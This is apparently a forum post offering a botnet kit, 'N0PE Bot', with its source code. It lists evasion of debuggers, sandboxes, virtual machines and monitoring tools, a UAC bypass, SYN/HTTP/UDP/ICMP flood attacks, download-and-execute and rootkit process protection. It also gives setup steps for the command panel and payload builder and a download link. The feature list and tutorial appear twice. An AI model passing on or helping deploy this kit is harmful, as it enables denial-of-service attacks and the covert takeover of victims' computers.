N0PE Bot v1.0.5.0 + Sources

Anti Debugger
Anti Sandboxie
Anti Emulator
Anti Netstat
Anti Filemon
Anti Processmon
Anti Regmon
Anti Cain & Abel
Anti Networkmon
Anti TCPView
Anti Wireshark
Anti ParallelsDesktop
Anti VMWare
Anti VirtualBox
Anti VirtualPC
Anti UAC
SYN Flood
HTTP Flood
UDP Flood
ICMP Flood
Download & Execute
Visit Page
Update Bot
Remove Bot
Protect Process RootKit
N0PE Bot Install Tutorial:
* Config file configuration (/Webpanel/system/config.php)
* After configurations, upload all files on your host.
* Then Chmod 777 for all folder and subfolders
* Create new database in MySql and import db.sql from Database folder.
* Then Open Builder and create server.exe
Anti Sandboxie
Anti Emulator
Anti Netstat
Anti Filemon
Anti Processmon
Anti Regmon
Anti Cain & Abel
Anti Networkmon
Anti TCPView
Anti Wireshark
Anti ParallelsDesktop
Anti VMWare
Anti VirtualBox
Anti VirtualPC
Anti UAC
SYN Flood
HTTP Flood
UDP Flood
ICMP Flood
Download & Execute
Visit Page
Update Bot
Remove Bot
Protect Process RootKit
N0PE Bot Install Tutorial:
* Config file configuration (/Webpanel/system/config.php)
* After configurations, upload all files on your host.
* Then Chmod 777 for all folder and subfolders
* Create new database in MySql and import db.sql from Database folder.
* Then Open Builder and create server.exe
Download https://mega.nz/#!6YshCJLS!QM6kOF-bQqaic6cN7BfoljXTd04Yw_GoFqhSz-yIcHQ
pw pls